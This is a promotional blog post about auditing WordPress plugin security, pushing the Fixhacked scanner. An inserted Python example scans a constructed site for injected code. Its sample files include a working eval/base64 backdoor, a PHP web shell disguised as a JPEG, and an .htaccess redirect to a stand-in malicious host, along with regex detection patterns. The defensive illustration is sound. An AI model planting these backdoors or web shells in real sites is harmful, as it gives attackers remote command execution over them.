How To Audit Your Web-Application Security
As WordPress has grown over the years (exponentially so), it has evolved from a simple blogging platform into a CMS (Content Management System) and, more recently, into a cheaper route to web application development. What this means to you (and me), as both site users and content creators, is that as its ease of use and functionality have grown, so have its complexity and the resulting security threats… to an extent.
In this article I am focussing specifically on how to audit the web applications running on your WordPress site and on the security ramifications of leaving them unaudited, so that you understand how to conduct a proper web application security audit of your own.
First off, let me put it in layman's terms: a web application here means a plugin, a piece of web-based software, or a SaaS (software as a service) integration that runs on the WordPress platform or connects it to external sites. Have you ever installed a plugin that lets you run polls inside one of your articles, or gather customers' opinions on a product? That's a web application. What about a shopping cart plugin that takes card payments online? That's also a web application.
Now you need to understand how to audit these applications and make sure that your site and the applications you use are as secure as they can be. If you have ever been hit by an attack that exploited a vulnerability in one of the themes or plugins on your WordPress site, read on. If you haven't yet and are merely looking into how to audit your security correctly… read on.
It is imperative that you audit your web application security on a continual basis. Attackers often target the weaker web-based applications in order to gain access to your WordPress site, because these applications have permanent (24 hours a day, 7 days a week) access to your back-end data. A shopping cart, a login page, and even a dynamic theme all handle valuable data and all have round-the-clock access to your WordPress database.
Web-based applications are often vulnerable because they are tailor-made to complete certain (sometimes limited) functions and receive far less scrutiny than WordPress core, so vulnerabilities are often not noticed until they have been exploited. In the case of some plugins, a known vulnerability may never be patched at all. I wrote about this not so long ago with a piece on XSS (Cross-Site Scripting).
If you have not yet been impacted by any of these security issues, I advise you to take steps to avoid it by downloading Fixhacked and letting it run in the background on your WordPress site, checking for malicious activity 24/7.
If you are currently impacted by such an attack, the advice is the same: download and run Fixhacked on your site, and consult an expert where necessary.
When you download the Fixhacked scanner and upload it to your WordPress site, it searches your .php files for code of the kind used in malware attacks on WordPress. In other words, it looks for injected code, and for .htaccess files that change how parts of your site are executed or where requests are sent. (This is code injection into files, not SQLi, SQL injection, which attacks the database through unsanitised queries.) Injected code of this kind can redirect a customer or site user who clicks on an image to another site that is unsafe, or that purports to be your own. Basically, by inserting a line of code, some little git can divert your trusting users and customers down a dark alley of despair and even daylight robbery.
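To make the description above concrete, here is a small file-system scan of the kind a WordPress audit performs. This is an added illustration and not the Fixhacked scanner or any of its code: it walks an install, flags a handful of well-known indicators of injected PHP (obfuscated `eval` chains, request parameters called as functions, the old `preg_replace` `/e` trick, PHP code hidden in an "image" upload) and .htaccess tampering (off-site redirects, PHP handlers for image extensions, `auto_prepend_file`), and reports file and line. The sample site it scans is constructed inline; the paths, the indicator names and the `evil.example` host are all made up for the example. A real scanner also compares files against known-good checksums of core, theme and plugin releases; this one deliberately does not.

```python
"""Added example: scan a WordPress tree for injected PHP and .htaccess tampering.

Not the Fixhacked scanner; a minimal, pattern-based illustration of what
"searching for injected .php code and .htaccess files" means in practice.
"""
import re
import tempfile
from pathlib import Path

PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".php7", ".inc"}

# Patterns typical of injected PHP: obfuscated eval chains, request parameters
# invoked as functions, preg_replace with the /e modifier, hex-escaped names.
PHP_INDICATORS = {
    "eval_of_decoded_string": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "request_param_called_as_function": re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    "preg_replace_e_modifier": re.compile(
        r"preg_replace\s*\(\s*['\"][^'\"]*[/#~][a-z]*e[a-z]*['\"]\s*,", re.I),
    "hex_escaped_run": re.compile(r"(?:\\x[0-9a-f]{2}){4,}", re.I),
}

# .htaccess directives that send visitors off-site or change what Apache runs as PHP.
HTACCESS_INDICATORS = {
    "redirect_to_external_host": re.compile(
        r"^\s*(?:RewriteRule|Redirect(?:Match)?)\s+\S+\s+https?://", re.I | re.M),
    "php_handler_for_non_php": re.compile(
        r"^\s*(?:AddHandler|AddType)\s+\S*php\S*\s+\.(?:jpe?g|png|gif|ico|txt)", re.I | re.M),
    "auto_prepend_or_append_file": re.compile(
        r"^\s*php_value\s+auto_(?:prepend|append)_file", re.I | re.M),
}

PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.I)


def _line_of(text: str, offset: int) -> int:
    return text.count("\n", 0, offset) + 1


def scan_file(path: Path, root: Path) -> list[tuple[str, str, int]]:
    """Return (relative path, indicator, line) for every hit in one file."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    rel = path.relative_to(root).as_posix()
    hits = []
    if path.name == ".htaccess":
        rules = HTACCESS_INDICATORS
    elif path.suffix.lower() in PHP_EXTENSIONS:
        rules = PHP_INDICATORS
    else:
        # PHP hidden in an upload, e.g. a "JPEG" that is really a web shell.
        m = PHP_OPEN_TAG.search(text)
        if m:
            hits.append((rel, "php_code_in_non_php_file", _line_of(text, m.start())))
        return hits
    for name, pattern in rules.items():
        for m in pattern.finditer(text):
            hits.append((rel, name, _line_of(text, m.start())))
    return hits


def scan_tree(root: Path) -> list[tuple[str, str, int]]:
    """Walk an install and collect every indicator hit, sorted by path."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_file():
            findings.extend(scan_file(path, root))
    return sorted(findings)


# Constructed sample site (made up for this example): two clean files, three infections.
SAMPLE_FILES = {
    "wp-content/plugins/poll/poll.php":
        "<?php\n$choice = isset($_POST['choice']) ? (int) $_POST['choice'] : 0;\n"
        "$payload = base64_decode($stored);  // legitimate decode, no eval\n",
    "wp-content/themes/mytheme/functions.php":
        "<?php\nadd_action('init', function () { echo esc_html($_GET['q'] ?? ''); });\n",
    "wp-content/uploads/2021/cache.php":
        "<?php\n/* harmless-looking comment */\neval(base64_decode($_POST['p']));\n",
    "wp-content/uploads/logo.jpg":
        "GIF89a\x00\x00<?php system($_GET['c']); ?>",
    ".htaccess":
        "RewriteEngine On\nRewriteCond %{HTTP_REFERER} google\\.\n"
        "RewriteRule ^(.*)$ http://evil.example/$1 [R=302,L]\n",
}


def build_sample_site(root: Path) -> None:
    for rel, body in SAMPLE_FILES.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")


def demo() -> list[tuple[str, str, int]]:
    """Build the sample site in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(Path(tmp))
        return scan_tree(Path(tmp))


if __name__ == "__main__":
    for rel, indicator, line in demo():
        print(f"{rel}:{line}: {indicator}")
```

Run it as-is and it reports the planted `.htaccess` redirect, the `eval(base64_decode(...))` backdoor in `uploads/`, and the PHP hidden inside `logo.jpg`, while the two legitimate files (one of which calls `base64_decode` without `eval`) produce nothing. Point `scan_tree` at a real `wp-content` directory to try it on your own site; treat hits as leads to inspect by hand, since pattern matching alone produces both false positives and misses.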
You don't want that, and neither would I. I have been the victim of hacking attacks in the past and wouldn't wish it on anyone. It's inconvenient and destroys your trust in a product or a service. It's not always about preventing; sometimes it's about responding. Whatever audits you have to do, Fixhacked can help with your particular security issue and resolve it.
So what to do next?
Download our free scanner. It scans your site, including all your files and folders (libraries), and highlights any issues or exploits your site may be afflicted by.
If this is confusing, as it may well be at times, you can always contact us and 'Hire an Expert' to rectify these issues and explain how you can resolve them.